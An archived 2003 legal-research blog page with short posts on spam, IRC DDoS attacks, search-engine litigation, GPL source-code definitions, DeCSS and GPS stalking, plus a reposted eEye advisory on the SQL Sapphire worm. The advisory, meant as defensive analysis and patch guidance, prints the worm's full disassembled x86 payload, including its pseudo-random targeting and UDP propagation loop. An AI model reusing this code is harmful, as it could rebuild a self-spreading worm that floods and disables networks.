This is a archived project. See http://blogs.23.nu/disLEXia/stories/492/ for details and further pointers.

disLEXia

laws, lies, legal research and the internet

overview for Monday, 27. January 2003

Monday, 27. January 2003

Mobile code on the loose - worms break the internet again.


02:16 | permanent link | mail this

Len Sassaman:on locks

Len Sassaman: "Locksmiths generally don't discuss the plethora of ways to defeat standard physical security techniques with the general public. Sometimes I think they understand the issue of threat-models better than cryptographers do. They certainly understand that the public doesn't understand." [Hack the Planet]
02:26 | permanent link | mail this

Massive Network Attack was a deliberate attack against South Korea

So is this cyberwar against South Korea or a worm and bad journalism?
02:30 | permanent link | mail this

Junk-mail Foe Joe Is Caught Spamming

January 26, 2003 -- Hours after announcing he would run for president in 2004, Sen. Joseph Lieberman - a vocal opponent of "spam" - flooded the Internet with his own junk e-mail.

The notice broadcasting Lieberman's candidacy was sent to thousands of addresses purchased from ROPAC, a defunct political action committee that had compiled the list from a variety of sources, The Post has learned.

The tactic was surprising. Two years ago, Sen. Lieberman co-sponsored the anti-junk-mail legislation "CAN-SPAM." He stated at the time: "[Spam] is not requested by the receiver. It almost never contains any information of substance or value . . . only Congress has the power to regulate interstate commerce and address this problem on a national scale."

New York Post Jan 26 2003 6:04AM ET [moreover Computersecurity]
09:00 | permanent link | mail this

Could Attack on DALnet Spell End for IRC?

For at least a month, distributed denial of service (define), or DDOS, attacks have been crippling DALnet, one of the world's largest Internet Relay Chat (define) networks, bringing it to its knees and raising the possibility that many hosting providers may refuse to host IRC servers at all. [LinuxSecurity.com]
09:01 | permanent link | mail this

A Google Win in SearchKing Case

In SearchKing v. Google the judge has denied SearchKing's request for preliminary injuction. In other words, SearchKing asked for their old PageRank to be reinstated while the trial was being held, and the judge said no. LawMeme has the full story, including several interesting quotes from the judge's dedcision. The author has an interesting thought in the comments:Let's step over into Bizarro world, where Badgle, the leading search engine, is run by Dr. Evil. Badgle uses familiar algorithms to rank pages, except that whenever its engineers find a page they don't like, they manually drop it down a hundred pages in the search results. And, interestingly enough, the only pages Badgle doesn't like are those that praise Austin Powers. Thus, when you run a Badgle search on "Austin Powers," you get back only pages making fun of his bad teeth. Whenever someone wonders why the leading Austin Powers fan page has a low ranking and asks Badgle what's going on. Badgle replies that the page's operator "was engaged in behavior that would lower the quality of Badgle's search results." Would this scenario change your point of view? Maybe not, but I suspect that there are many people who support Google whole-heartedly in this lawsuit, but who wouldn't be so willing to support Badgle's actions.So this decision could have much farther-reaching effects than whether search engines can demote the PageRank of "spam kings". Stay tuned.... [Google Weblog]
09:02 | permanent link | mail this

SQL Sapphire Worm Analysis

Forwarded from: "Marc Maiffret" <marc@eeye.com>

SQL Sapphire Worm Analysis

Release Date:
1/25/03

Severity:
High

Systems Affected:
Microsoft SQL Server 2000 pre SP 2

Description:
Late Friday, January 24, 2003 we became aware of a new SQL worm
spreading quickly across various networks around the world.

The worm is spreading using a buffer overflow to exploit a flaw in
Microsoft SQL Server 2000. The SQL 2000 server flaw was discovered in
July, 2002 by Next Generation Security Software Ltd. The buffer
overflow exists because of the way SQL improperly handles data sent to
its Microsoft SQL Monitor port. Attackers leveraging this
vulnerability will be executing their code as SYSTEM, since Microsoft
SQL Server 2000 runs with SYSTEM privileges.

The worm works by generating pseudo-random IP addresses to try to
infect with its payload. The worm payload does not contain any
additional malicious content (in the form of backdoors etc.); however,
because of the nature of the worm and the speed at which it attempts
to re-infect systems, it can potentially create a denial-of-service
attack against infected networks.

We have been able to verify that multiple points of connectivity on
the Internet have been bogged down since 9pm Pacific Standard Time.

It should be noted that this worm is not the same as an earlier SQL
worm that used the SA/nopassword SQL vulnerability as its spread
vector. This is a new worm is more devastating as it is taking
advantage of a software-specific flaw rather than a configuration
error. We have already had many reports of smaller networks brought
down due to the flood of data from the Sapphire Worm trying to
re-infect new systems.

Corrective Action

We recommend that people immediately firewall SQL service ports at all
of their gateways. The worm uses only UDP port 1434 (SQL Monitor Port)
to spread itself to a new system; however, it is safe practice to
filter all SQL traffic at all gateways. The following is a list of
SQL server ports: ms-sql-s 1433/tcp #Microsoft-SQL-Server ms-sql-s
1433/udp #Microsoft-SQL-Server ms-sql-m 1434/tcp
#Microsoft-SQL-Monitor ms-sql-m 1434/udp #Microsoft-SQL-Monitor

Once again this worm is taking advantage of a known vulnerability that
has had a patch available for many months. Microsoft has also released
a recent service pack for SQL (Service Pack 3) that includes a fix for
this vulnerability.

Standalone patch:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/
bulletin/MS02-039.asp

SQL 2000 Service Pack 3:
http://www.microsoft.com/sql/downloads/2000/sp3.asp

Previous SQL Service Pack versions are vulnerable.

Technical Description

The following is a quick run-down of what the worm's payload is doing after
infection:

1. Retrieves the address of GetProcAddress and Loadlibrary from the
IAT in sqlsort.dll. It snags the necessary library base addresses and
function entry points as needed.
2. Calls gettickcount, and uses returned count as a pseudo-random seed
3. Creates a UDP socket
4. Performs a simple pseudo random number generation formula using the
returned gettickcount value to generate an IP Address that will later
be used as the target.
5. Send worm payload in a SQL Server Resolution Service request to the
pseudo random target address, on port 1434 (UDP).
6. Return back to formula and continue generating new pseudo random
addresses.


push 42B0C9DCh ; [RET] sqlsort.dll -> jmp esp
mov eax, 1010101h ; Reconstruct session, after the
overflow the payload buffer
; get's corrupted during program
execution but before the
; payload is executed. .
xor ecx, ecx
mov cl, 18h

FIXUP:
push eax
loop FIXUP
xor eax, 5010101h
push eax
mov ebp, esp
push ecx
push 6C6C642Eh
push 32336C65h
push 6E72656Bh ; kernel32
push ecx
push 746E756Fh ; GetTickCount
push 436B6369h
push 54746547h
mov cx, 6C6Ch
push ecx
push 642E3233h ; ws2_32.dll
push 5F327377h
mov cx, 7465h
push ecx
push 6B636F73h ; socket
mov cx, 6F74h
push ecx
push 646E6573h ; sendto
mov esi, 42AE1018h ; IAT from sqlsort
lea eax, [ebp-2Ch] ; (ws2_32.dll)
push eax
call dword ptr [esi] ; call loadlibrary
push eax
lea eax, [ebp-20h]
push eax
lea eax, [ebp-10h] ; (kernel32.dll)
push eax
call dword ptr [esi] ; loadlibrary
push eax
mov esi, 42AE1010h ; IAT from sqlsort
mov ebx, [esi]
mov eax, [ebx]
cmp eax, 51EC8B55h ; check entry point fingerprint
jz short VALID_GP ; Check entry point fingerprint for
getprocaddress, if it failes
; fall back to GetProcAddress entry
in another DLL version.
; Undetermined what dll versions
this will succedd on. Due
; to the lack of reliable importing
this may not work across all
; dll versions.
mov esi, 42AE101Ch ; IAT entry -> 77EA094C

VALID_GP:
call dword ptr [esi] ; GetProcAddress
call eax ; return from GetProcaddress =
GetTickCount entrypoint
xor ecx, ecx
push ecx
push ecx
push eax
xor ecx, 9B040103h
xor ecx, 1010101h
push ecx ; 9A050002 = port 1434 / AF_INET
lea eax, [ebp-34h] ; (socket)
push eax
mov eax, [ebp-40h] ; ws2_32 base address
push eax
call dword ptr [esi] ; GetProcAddress
push 11h
push 2
push 2
call eax ; socket
push eax
lea eax, [ebp-3Ch] ; sendto
push eax
mov eax, [ebp-40h] ; ws2_32 base address
push eax
call dword ptr [esi] ; GetProcAddress
mov esi, eax ; save sendto -> esi
or ebx, ebx
xor ebx, 0FFD9613Ch

PRND:
mov eax, [ebp-4Ch] ; Pseudo Random Algorithm Start
lea ecx, [eax+eax*2]
lea edx, [eax+ecx*4]
shl edx, 4
add edx, eax
shl edx, 8
sub edx, eax
lea eax, [eax+edx*4]
add eax, ebx ; Pseudo Random Algorithm End
mov [ebp-4Ch], eax
push 10h
lea eax, [ebp-50h]
push eax
xor ecx, ecx
push ecx
xor cx, 178h
push ecx
lea eax, [ebp+3]
push eax
mov eax, [ebp-54h]
push eax
call esi ; sendto
jmp short PRND ; Jump back to Pseudo Random Algorithm
Start

In Closing
We have provided brief information here as we are currently working to
understand more of the worm's internal behavior. We will provide
updates as they become available.

This worm has been dubbed the "Sapphire Worm" by eEye due to the fact
that several engineers had to be pulled away from local bars to begin
the investigation/dissection process.

Credit:
Riley Hassell

Related Links:
SQLSecurity.com
http://sqlsecurity.com/

Microsoft Security Bulletin:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/
bulletin/ms02-039.asp

Copyright (c) 1998-2003 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of eEye. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please e-mail
alert@eEye.com for permission.

Disclaimer
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatsoever arising out of
or in connection with the use or spread of this information. Any use
of this information is at the user's own risk.

Feedback
Please send suggestions, updates, and comments to:

eEye Digital Security
http://www.eEye.com
info@eEye.com [isn]
09:03 | permanent link | mail this

DoD offering admin privileges on .mil Web sites

Care to register a .mil Web site of your own for free? The DoD has gone out of its way to make it a snap. An unbelievably badly-protected admin interface welcomes you to register whatever domain you please (http://Rotten.mil anyone?), or edit anything they've already got. The interface is so ludicrously unprotected that it's been cached by Google and fails to mention that you must be authorized to muck about with it. Incredibly, default passwords are cheerfully provided on the page.

Following an anonymous tip from an observant Reg reader, we've encountered the page in question in the Google cache, and after a bit of our own poking about have also discovered an equally unprotected (and Google-cached) admin interface encouraging us to add a new user, like ourselves, say, which requires no authentication .

All you have to do is find that page and you can set yourself up with a user account, manage your new .mil Web site, fiddle about with other people's .mil Web sites, and generally make an incredible nuisance of yourself. We are, of course, straining against every natural, journalistic impulse in our beings by neglecting to mention any useful search strings with which to find it.

Another unprotected and cached page, this one discovered by our tipster, lists traffic to a major DoD Web site by URL/IP address. This worries us because it may list .mil sites and networked DoD machines that are not public, not hotlinked anywhere, and which might contain (or be networked with other machines that contain) sensitive data. Merely knowing that all those URLs and IP addys are valid and owned by DoD would give a significant advantage to attackers by narrowing their target area dramatically.

We have e-mailed the person who manages these sites - twice in fact - but so far have not been graced with a reply. We were hoping that they might be inclined to fix this mess quickly so that we could safely include the details in our report. Unfortunately we have to withhold them until we're confident that these security snafus are under control.

[The Register - Security]
09:04 | permanent link | mail this

What is sourcecode? - The GPLs definition.

Lat summer we had some discussion about the meaning of source code and object code see some of it at:

Now Olaf Koglin points out that Richard Stallmann has thought about this a long time ago and found a very nice definition for the GPL:

The source code for a work means the preferred form of the work for making modifications to it. For an executable work, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the executable.

But it still has some problems. E.G. I have started using Unicode Terminals, an Unicode-Aware Editor (XEmacs), and converrted most of my plain-text files from latin1 to unicode. Some of my newer Python source code is unicode, too. Since python does not grok unicode sourcecode as it should a shell script does a recode utf-8..latin1 on the fly before executing. With the above definition the latin1 version of the source code would not being considered source code. I'm not sure if this is a desirable result.

We could say, that the results of lossless transformations on the source code still could be considered source code - but isn't encryption a lossless transformation, too?
11:02 | permanent link | mail this

Sorcecode, Binaries and NDAs

If you consider binarys as equivalent to sourcecode how could you give out a programm (e.g. a hardware driver) and still comply to non-dislosure agreements you might have signed regarding on the information manifested in the programm.

E.g. when you want do develop a deriver for special hardware the hardware manufacturer will give you the technical specifications only if you sign a NDA keeping you from giving away the sourcecode of the driver you are developing. This hurts many Freie Software Projects. But if 'Open Code = Closed Code' you even can't give away the binary driver.
11:04 | permanent link | mail this

How to distinguish software (programs) from data?

Olaf and I looking for ways to distinguish Software and (other) data. So what is a Programm? In "Der Datenbegriff im Recht" we (Kay Schumann and I) suggest that distinguishing between programms and data is impractical.

There is an ugly catch. The Law assumes they can be destinguished. Especally interlectual property law provides special rules for software.

So how to distinguish software (programs) from data?
12:30 | permanent link | mail this

Legal Books by Lenz

Karl-Friedrich Lenz is publishing several legal books (in german) under a Creative Commons License. More power to him!
13:41 | permanent link | mail this

comp.risks: Computer sabotage against Venezuela oil?

From: David Wagner <daw@cs.berkeley.edu>

Oil Daily quoted Ali Rodriguez (head of Venezuela's state oil company):

"[...] we have suffered many acts of sabotage at the terminals, the refiners, and even to some well-heads in Lake Maracaibo. There were even instances of computer hacking which did a lot of damage since much of the operation is centrally controlled by computer." [Source: *Oil Daily*, vol 53, no 9, 14 Jan 2003]
14:06 | permanent link | mail this

Supreme Court backs off on DVD descrambling code

NewsScan <newsscan@newsscan.com> Mon, 06 Jan 2003 09:21:41 -0700

The U.S. Supreme Court has rescinded an emergency stay barring defendant Matthew Pavlovich from distributing DeCSS, a software utility that descrambles the digital lock on most DVDs to prevent copying them. Pavlovich is now free to distribute the code, but could be sued again if he decides to do so. "The entertainment companies need to stop pretending that DeCSS is a secret," says Cindy Cohn, legal director for the Electronic Frontier Foundation, which is assisting Pavlovich. "Justice O'Connor correctly saw that there was no need for emergency relief to keep DeCSS a secret. It doesn't pass the giggle test." The rescission is just the latest twist in a case that has been winding its way through the courts since 1999, when the DVD Copy Control Association -- a coalition of movie studios and consumer electronics makers -- filed a lawsuit against scores of people, alleging violations of California's trade secret laws. [CNet News.com, 3 Jan 2003; NewsScan Daily, 6 Jan 2003] http://news.com.com/2100-1023-979197.html?tag=fd_top

See also: http://md.hudora.de/blog/guids/53/32/2542302222754864.html
14:11 | permanent link | mail this

comp.risks: Man allegedly stalks ex-girlfriend with help of GPS

George Mannes <George.Mannes@thestreet.com> Fri, 3 Jan 2003 11:57:23 -0500

The story starts here on The Smoking Gun (GPS angle appears at bottom of second page of typed complaint): http://www.thesmokinggun.com/archive/pseidler1.html

As far as I can guess (not confirmed) this is the product allegedly used: http://www.landairsea.com/Land%20Air%20Sea%20Smart%20Track%20Brochure.pdf

Now anyone, for better or worse, can be James Bond.

[A 42-year-old Wisconsin man is accused of stalking an ex-girlfriend by placing a GPS tracking device under the hood of her car. The device George refers to is called SmartTrack. PGN]
14:14 | permanent link | mail this

disLEXia, a research project by Maximillian Dornseif

disLEXia

January 2003
 
Mo Tu We Th Fr Sa Su
1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31
Dec Feb
Search: